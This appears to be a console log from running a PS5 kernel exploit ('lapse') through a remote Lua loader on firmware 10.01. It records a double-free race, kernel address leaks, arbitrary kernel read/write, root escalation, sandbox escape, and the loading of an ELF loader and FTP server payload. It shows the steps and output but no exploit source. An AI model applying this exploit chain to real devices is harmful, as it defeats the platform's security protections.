set IP 192.168.43.129
set Port 9026
set Payload D:/Getestet/PS5/remote_lua_loader/payloads/lapse.lua
Server Status 1
lapse exploit
running on ps5 10.01
game @ Aibeya
pinning to core 4 with prio 256
block_fd 21 unblocked_fd 22
[+] Double-free AIO
sd_listen: 135
sd_client: 136
sd_conn: 137
suspend 0x18d03: 0
poll: 0x10004
tcp state: 0x5
resume 0x18d03: 0
sce_errs: 0x0 0x0
aliased rthdrs at attempt: 2 (found pair: 27 55)
won race at attempt 1
[+] Leak kernel addresses
confuse evf with rthdr
confused rthdr and evf at attempt: 2
"evf cv" string addr: 0xffffffff87db1641
kernel buffer addr: 0xffffd9193fbcdf80
found reqs2 and fake reqs3 at attempt: 2
reqs2 offset: 0x180
fake reqs3 offset: 0x280
leaked aio_entry:
0x3109acc40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x3109acc50 00 87 12 31 19 D9 FF FF 40 3A BB 3F 19 D9 FF FF ...1....@:.?....
0x3109acc60 00 9C 60 35 19 D9 FF FF 00 00 00 00 00 00 00 00 ..`5............
0x3109acc70 09 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................
0x3109acc80 00 00 00 00 00 00 00 00 80 D9 BC 3F 19 D9 FF FF ...........?....
0x3109acc90 48 4A BD 3F 19 D9 FF FF 00 00 00 00 00 00 00 00 HJ.?............
0x3109acca0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x3109accb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CB D6 ................
reqs1_addr = 0xffffd91931128700
fake_reqs3_addr = 0xffffd9193fbce210
searching target_id
found target_id=0x6308, i=324, batch=54
[+] Double free SceKernelAioRWRequest
start overwrite rthdr with AIO queue entry loop
aliased at attempt: 2
start overwrite AIO queue entry with rthdr loop
states[64] = 0x3
found req_id at batch: 2
aliased at attempt: 2
req_id = 0x406315
states[64] = 0x3
target's state: 0x4
aliased pktopts at attempt: 2 (found pair: 124 129)
delete errors: 0x0 0x0
target states: 0x80020003 0x80020003
[+] Get arbitrary kernel read/write
overwrite main pktopts
found reclaim sd at attempt: 2
slow_kread8(&"evf cv"): 0x6700766320667665
*(&"evf cv"): evf cv
slow arbitrary kernel read achieved
curproc = 0xffffd91930d1a6b8
restricted kernel r/w achieved
arbitrary kernel r/w achieved!
fixes applied
[+] Post exploitation
patching curproc 0xffffd91930d1a6b8 (authid = 0x4800000000010003)
we root now? uid: before 1 after 0
we escaped now? in sandbox: before 1 after 0
applying patches to kernel data (with GPU DMA method)
setting security flags
setting targetid
setting qa flags and utoken flags
debug menu enabled
exploit state is saved into storage
done!
cleaning up
restoring to previous core/rtprio
set IP 192.168.43.129
set Port 9026
set Payload D:/Getestet/PS5/remote_lua_loader/payloads/elf_loader.lua
Server Status 1
loading elfldr from: /mnt/sandbox/CUSA17068_000/savedata0/elfldr.elf
spawning /mnt/sandbox/CUSA17068_000/savedata0/elfldr.elf
out = 0x0
done
set IP 192.168.43.129
set Port 9021
set Payload D:/Getestet/PS5/remote_lua_loader/payloads/ftpsrv.elf